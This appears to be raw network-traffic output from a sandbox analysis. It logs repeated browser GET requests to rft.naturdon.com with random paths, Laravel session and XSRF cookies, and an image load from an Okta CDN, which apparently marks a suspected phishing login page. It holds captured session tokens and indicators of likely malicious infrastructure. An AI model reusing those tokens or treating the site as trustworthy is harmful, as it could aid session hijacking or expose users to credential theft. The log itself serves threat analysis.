XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /efueBIf7KMBbXW0qQF2zeji3jy0JijcyRqJUUwcvNTCnOUKvkR78143 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /klZUXgOlh2u3Z2ys2P7suUE8OPsvE6D0NZcY24FlEVoyLh1rlCu0zJMqOpqgPM0t8xKY93rEWKezYEZUkbXH3MBDHfCQeW7aWFIDvpz4vU3PIiYP2CoSTMqCoZvmlMmOzASNryz660 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /klVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZAopRdu3RNdl8MlVtw7oEWHHR2t8JGp85UDgXLK6yz230 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijQ0IOXUR1aIdE2dIax8V9VT5mgSv8B3wxiSY8D4KNzfk5az6fKC4B8vvw56170 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzUMXXAK9cdiVG7unTSOjXlhW72wM8rZJ7uRvQrQmnp9mH4LntaZDifn490180 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /dezNUCB7F1KEsi0FN0wryA8y4av4n6Oz1WzLtiMGksrOn987oMYSmcxxtWYou2jfcMbVvmkb60VdA3wr1dwZEXuZoYuejWksgw45j3q4VZxbXQF10CkWdNYZxh3MHx6WHC7lGtJJ6scfMTtvSsNFNJCw93uLSr83gx6zpijd2MxlyhgcWIfR6tYb2L6cd662 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /wxR15iAruHCp5MR53stdlsbAewGX1FsavzlKmlR34130 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rsj9FvgfYrm0DCkU7R3E0ZVRtwZjLNORj7eVq7ghG3bg6DT6IOZl4JRef193 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /qrhmLtoaKGMi81xl8TzghJ99XVgOdtJgIR4uW45140 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijrlV3hi6dkeYhbR0U6WhmmiYz2MGccNsZegAMCklGrcaCM65n1iEmiCkEsATX4zN3WzSG5I12210 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /efueBIf7KMBbXW0qQF2zeji3jy0JijcyRqJUUwcvNTCnOUKvkR78143 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /optadu1ofPxrFCa4cOe9bGejoa2vR7hUGzGuvm86IppsV4y85FAZpZxeuef235 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijQ0IOXUR1aIdE2dIax8V9VT5mgSv8B3wxiSY8D4KNzfk5az6fKC4B8vvw56170 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; 